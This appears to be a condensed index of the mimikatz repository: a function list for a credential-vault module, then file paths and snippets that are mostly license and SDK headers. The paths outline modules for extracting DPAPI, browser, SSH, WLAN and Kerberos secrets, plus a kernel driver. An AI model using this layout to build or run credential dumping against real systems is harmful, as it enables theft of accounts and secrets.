function kull_m_cred_vault_policy_key_delete (line 377) | void kull_m_cred_vault_policy_key_delete(PKULL_M_CRED_VAULT_POLICY_KEY key)
function kull_m_cred_vault_policy_key_descr (line 387) | void kull_m_cred_vault_policy_key_descr(DWORD level, PKULL_M_CRED_VAULT_...
function BOOL (line 399) | BOOL kull_m_cred_vault_policy_key(PVOID data, DWORD size, BYTE aes128[AE...
function PKULL_M_CRED_VAULT_CREDENTIAL (line 448) | PKULL_M_CRED_VAULT_CREDENTIAL kull_m_cred_vault_credential_create(PVOID ...
function kull_m_cred_vault_credential_create_attribute_from_data (line 494) | void kull_m_cred_vault_credential_create_attribute_from_data(PBYTE ptr, ...
function kull_m_cred_vault_credential_delete (line 520) | void kull_m_cred_vault_credential_delete(PKULL_M_CRED_VAULT_CREDENTIAL c...
function kull_m_cred_vault_credential_descr (line 549) | void kull_m_cred_vault_credential_descr(DWORD level, PKULL_M_CRED_VAULT_...
function kull_m_cred_vault_credential_attribute_descr (line 570) | void kull_m_cred_vault_credential_attribute_descr(DWORD level, PKULL_M_C...
function PKULL_M_CRED_VAULT_CLEAR (line 592) | PKULL_M_CRED_VAULT_CLEAR kull_m_cred_vault_clear_create(PVOID data/*, DW...
function kull_m_cred_vault_clear_delete (line 615) | void kull_m_cred_vault_clear_delete(PKULL_M_CRED_VAULT_CLEAR clear)
function kull_m_cred_vault_clear_descr (line 631) | void kull_m_cred_vault_clear_descr(DWORD level, PKULL_M_CRED_VAULT_CLEAR...
FILE: modules/kull_m_cred.h
type KULL_M_CRED_VAULT_CREDENTIAL_ATTRIBUTE (line 15) | typedef struct _KULL_M_CRED_VAULT_CREDENTIAL_ATTRIBUTE {
type KULL_M_CRED_ATTRIBUTE (line 29) | typedef struct _KULL_M_CRED_ATTRIBUTE {
type KULL_M_CRED_BLOB (line 39) | typedef struct _KULL_M_CRED_BLOB {
type KULL_M_CRED_LEGACY_CRED_BLOB (line 75) | typedef struct _KULL_M_CRED_LEGACY_CRED_BLOB {
type KULL_M_CRED_LEGACY_CREDS_BLOB (line 106) | typedef struct _KULL_M_CRED_LEGACY_CREDS_BLOB {
type KULL_M_CRED_VAULT_POLICY_KEY (line 114) | typedef struct _KULL_M_CRED
Copy disabled (too large)
Download .json
Condensed preview — 361 files, each showing path, character count, and a content snippet. Download the .json file for the full structured content (12,397K chars).
[
{
"path": "README.md",
"chars": 5211,
"preview": "# mimikatz\n\n**`mimikatz`** is a tool I've made to learn `C` and make somes experiments with Windows security.\n\nIt's now "
},
{
"path": "appveyor.yml",
"chars": 1190,
"preview": "version: 2.2.0-ci-{branch}-{build}\r\nimage: Visual Studio 2013\r\nconfiguration: Release\r\nplatform:\r\n- x64\r\n- Win32\r\nshallo"
},
{
"path": "inc/DbgHelp.h",
"chars": 128775,
"preview": "/*++ BUILD Version: 0000 Increment this if a change has global effects\r\n\r\nCopyright (c) Microsoft Corporation. All r"
},
{
"path": "inc/DhcpSSdk.h",
"chars": 16765,
"preview": "/*++\r\n\r\nCopyright (C) 1997-1999 Microsoft Corporation\r\n\r\nModule Name:\r\n\r\n dhcpssdk.h\r\n\r\nAbstract:\r\n\r\n Header for w"
},
{
"path": "inc/DsGetDC.h",
"chars": 16284,
"preview": "/*++ BUILD Version: 0001 // Increment this if a change has global effects\r\n\r\nCopyright (c) 1996-1999 Microsoft Corpo"
},
{
"path": "inc/Fci.h",
"chars": 24758,
"preview": "/*** types.h - Common defines for FCI/FDI stuff -- goes into FCI/FDI.H\r\n *\r\n * Copyright (C) Microsoft Corporation\r"
},
{
"path": "inc/Midles.h",
"chars": 8004,
"preview": "/*++\r\n\r\nCopyright (c) Microsoft Corporation. All rights reserved.\r\n\r\nModule Name:\r\n\r\n midles.h\r\n\r\nAbstract:\r\n\r\n Th"
},
{
"path": "inc/NTSecPKG.h",
"chars": 66131,
"preview": "/*++ BUILD Version: 0000 Increment this if a change has global effects\r\n\r\nCopyright (c) Microsoft Corporation. All r"
},
{
"path": "inc/PshPack8.h",
"chars": 920,
"preview": "/*++\r\n\r\nCopyright (c) Microsoft Corporation. All rights reserved.\r\n\r\nModule Name:\r\n\r\n pshpack8.h\r\n\r\nAbstract:\r\n\r\n "
},
{
"path": "inc/SubAuth.h",
"chars": 12567,
"preview": "/*++ BUILD Version: 0005 Increment this if a change has global effects\r\n\r\nCopyright (c) Microsoft Corporation. All r"
},
{
"path": "inc/WDBGEXTS.H",
"chars": 76560,
"preview": "/*++\r\n\r\nCopyright (c) Microsoft Corporation. All rights reserved.\r\n\r\nModule Name:\r\n\r\n wdbgexts.h\r\n\r\nAbstract:\r\n\r\n "
},
{
"path": "inc/WinBer.h",
"chars": 13328,
"preview": "/*++\r\n\r\nCopyright (c) 1996-1999 Microsoft Corporation\r\n\r\nModule Name:\r\n\r\n winber.h Basic Encoding Rules (BER) API "
},
{
"path": "inc/WinDNS.h",
"chars": 57586,
"preview": "/*++\n\nCopyright (c) 1996-2005 Microsoft Corporation\n\nModule Name:\n\n windns.h\n\nAbstract:\n\n Domain Name System (DNS"
},
{
"path": "inc/Winldap.h",
"chars": 104415,
"preview": "/*++\r\n\r\nCopyright (c) 1996-1999 Microsoft Corporation\r\n\r\nModule Name:\r\n\r\n winldap.h LDAP client 32 API header file"
},
{
"path": "inc/cardmod.h",
"chars": 66008,
"preview": "//==============================================================;\r\n//\r\n// CARDMOD.H\r\n//\r\n// Abstract:\r\n// This is"
},
{
"path": "inc/fltUser.h",
"chars": 10100,
"preview": "/*++\r\n\r\nCopyright (c) 1989-2002 Microsoft Corporation\r\n\r\nModule Name:\r\n\r\n fltUser.h\r\n\r\nAbstract:\r\n Header file wh"
},
{
"path": "inc/fltUserStructures.h",
"chars": 15875,
"preview": "/*++\r\n\r\nCopyright (c) 1989-2002 Microsoft Corporation\r\n\r\nModule Name:\r\n\r\n fltUserStructures.h\r\n\r\nAbstract:\r\n\r\n Th"
},
{
"path": "inc/globals.h",
"chars": 5203,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "inc/msasn1.h",
"chars": 24919,
"preview": "/* Copyright (C) Boris Nikolaus, Germany, 1996-1997. All rights reserved. */\r\n/* Copyright (C) Microsoft Corporation 199"
},
{
"path": "inc/schannel.h",
"chars": 30316,
"preview": "//+---------------------------------------------------------------------------\r\n//\r\n// Microsoft Windows\r\n// Copyright"
},
{
"path": "inc/schnlsp.h",
"chars": 532,
"preview": "//+---------------------------------------------------------------------------\r\n//\r\n// Microsoft Windows\r\n// Copyright"
},
{
"path": "inc/wincred.h",
"chars": 44861,
"preview": "/*++ BUILD Version: 0001 // Increment this if a change has global effects\r\n\r\nCopyright (c) 2000 Microsoft Corporation"
},
{
"path": "kiwi_passwords.yar",
"chars": 2834,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimicom.idl",
"chars": 2850,
"preview": "import \"ms-dtyp.idl\";\r\n[\r\n uuid(17FC11E9-C258-4B8D-8D07-2F4125156244),\r\n version(1.0)\r\n]\r\ninterface MimiCom\r\n{\r\n\ttyp"
},
{
"path": "mimidrv/MAKEFILE",
"chars": 35,
"preview": "!INCLUDE $(NTMAKEENV)\\makefile.def\n"
},
{
"path": "mimidrv/SOURCES",
"chars": 319,
"preview": "TARGETNAME=mimidrv\nTARGETPATH=OBJ\nTARGETTYPE=DRIVER\nSOURCES=mimidrv.c \\\n\tmimidrv.rc \\\n\tkkll_m_process.c \\\n\tkkll_m_module"
},
{
"path": "mimidrv/_build_.cmd",
"chars": 663,
"preview": "@echo off\r\nset winddk=%SystemDrive%\\WinDDK\\7600.16385.1\r\n\r\nset mimidrv=%~dp0\r\nset path=%systemroot%;%systemroot%\\system3"
},
{
"path": "mimidrv/_clean_.cmd",
"chars": 449,
"preview": "@echo off\r\nset mimidrv=%~dp0\r\nset path=%systemroot%;%systemroot%\\system32\r\n\r\nset origplatform=%1\r\nset destination=%2\r\n\r\n"
},
{
"path": "mimidrv/_rebuild_.cmd",
"chars": 61,
"preview": "@echo off\r\ncall _clean_.cmd %1 \"%2\"\r\ncall _build_.cmd %1 \"%2\""
},
{
"path": "mimidrv/globals.h",
"chars": 1841,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/ioctl.h",
"chars": 4293,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/kkll_m_filters.c",
"chars": 7484,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/kkll_m_filters.h",
"chars": 529,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/kkll_m_memory.c",
"chars": 3029,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/kkll_m_memory.h",
"chars": 1437,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/kkll_m_modules.c",
"chars": 2948,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/kkll_m_modules.h",
"chars": 1371,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/kkll_m_notify.c",
"chars": 37835,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/kkll_m_notify.h",
"chars": 2045,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/kkll_m_process.c",
"chars": 10901,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/kkll_m_process.h",
"chars": 1593,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/kkll_m_ssdt.c",
"chars": 2370,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/kkll_m_ssdt.h",
"chars": 790,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/mimidrv.c",
"chars": 7367,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/mimidrv.h",
"chars": 576,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimidrv/mimidrv.vcxproj",
"chars": 2746,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" ToolsVersion=\"4.0\" xmlns=\"http://schemas.micros"
},
{
"path": "mimidrv/mimidrv.vcxproj.filters",
"chars": 1552,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "mimikatz/mimikatz.c",
"chars": 8415,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/mimikatz.h",
"chars": 2087,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/mimikatz.rc",
"chars": 962,
"preview": "#include <winres.h>\r\nLANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US\r\n\r\nVS_VERSION_INFO VERSIONINFO\r\n\r\nFILEVERSION\t\t\t2,2,0,0\r\n"
},
{
"path": "mimikatz/mimikatz.vcxproj",
"chars": 21825,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" ToolsVersion=\"4.0\" xmlns=\"http://schemas.micros"
},
{
"path": "mimikatz/mimikatz.vcxproj.filters",
"chars": 30536,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "mimikatz/modules/crypto/kuhl_m_crypto_extractor.c",
"chars": 38536,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/crypto/kuhl_m_crypto_extractor.h",
"chars": 16681,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/crypto/kuhl_m_crypto_patch.c",
"chars": 13287,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/crypto/kuhl_m_crypto_patch.h",
"chars": 638,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/crypto/kuhl_m_crypto_pki.c",
"chars": 25212,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/crypto/kuhl_m_crypto_pki.h",
"chars": 1464,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/crypto/kuhl_m_crypto_sc.c",
"chars": 16658,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/crypto/kuhl_m_crypto_sc.h",
"chars": 580,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/kuhl_m_dpapi.c",
"chars": 30916,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/kuhl_m_dpapi.h",
"chars": 1552,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/kuhl_m_dpapi_oe.c",
"chars": 21397,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/kuhl_m_dpapi_oe.h",
"chars": 3179,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_chrome.c",
"chars": 10845,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_chrome.h",
"chars": 1154,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c",
"chars": 2894,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h",
"chars": 252,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_cloudap.c",
"chars": 14547,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_cloudap.h",
"chars": 753,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_creds.c",
"chars": 8599,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_creds.h",
"chars": 958,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_keys.c",
"chars": 9748,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_keys.h",
"chars": 675,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_lunahsm.c",
"chars": 7136,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_lunahsm.h",
"chars": 697,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_powershell.c",
"chars": 4377,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_powershell.h",
"chars": 578,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_rdg.c",
"chars": 5978,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_rdg.h",
"chars": 832,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_sccm.c",
"chars": 5440,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_sccm.h",
"chars": 636,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_ssh.c",
"chars": 10135,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_ssh.h",
"chars": 1146,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_wlan.c",
"chars": 4051,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/dpapi/packages/kuhl_m_dpapi_wlan.h",
"chars": 307,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kerberos/kuhl_m_kerberos.c",
"chars": 41318,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kerberos/kuhl_m_kerberos.h",
"chars": 2661,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kerberos/kuhl_m_kerberos_ccache.c",
"chars": 7927,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kerberos/kuhl_m_kerberos_ccache.h",
"chars": 1075,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kerberos/kuhl_m_kerberos_claims.c",
"chars": 6251,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kerberos/kuhl_m_kerberos_claims.h",
"chars": 516,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kerberos/kuhl_m_kerberos_pac.c",
"chars": 19075,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h",
"chars": 1725,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kerberos/kuhl_m_kerberos_ticket.c",
"chars": 15003,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kerberos/kuhl_m_kerberos_ticket.h",
"chars": 4528,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m.h",
"chars": 718,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_acr.c",
"chars": 4649,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_acr.h",
"chars": 580,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_busylight.c",
"chars": 7877,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_busylight.h",
"chars": 682,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_crypto.c",
"chars": 55269,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_crypto.h",
"chars": 3807,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_dpapi.c",
"chars": 811,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttp://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : http://creativecommons"
},
{
"path": "mimikatz/modules/kuhl_m_dpapi.h",
"chars": 353,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttp://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : http://creativecommons"
},
{
"path": "mimikatz/modules/kuhl_m_event.c",
"chars": 9942,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_event.h",
"chars": 486,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_iis.c",
"chars": 11171,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_iis.h",
"chars": 1336,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_kernel.c",
"chars": 10431,
"preview": "/*\tBenjamin DELPY `gentilkiwi`\r\n\thttps://blog.gentilkiwi.com\r\n\tbenjamin@gentilkiwi.com\r\n\tLicence : https://creativecommo"
},
{
"path": "mimikatz/modules/kuhl_m_kernel.h",
"chars": 1097,
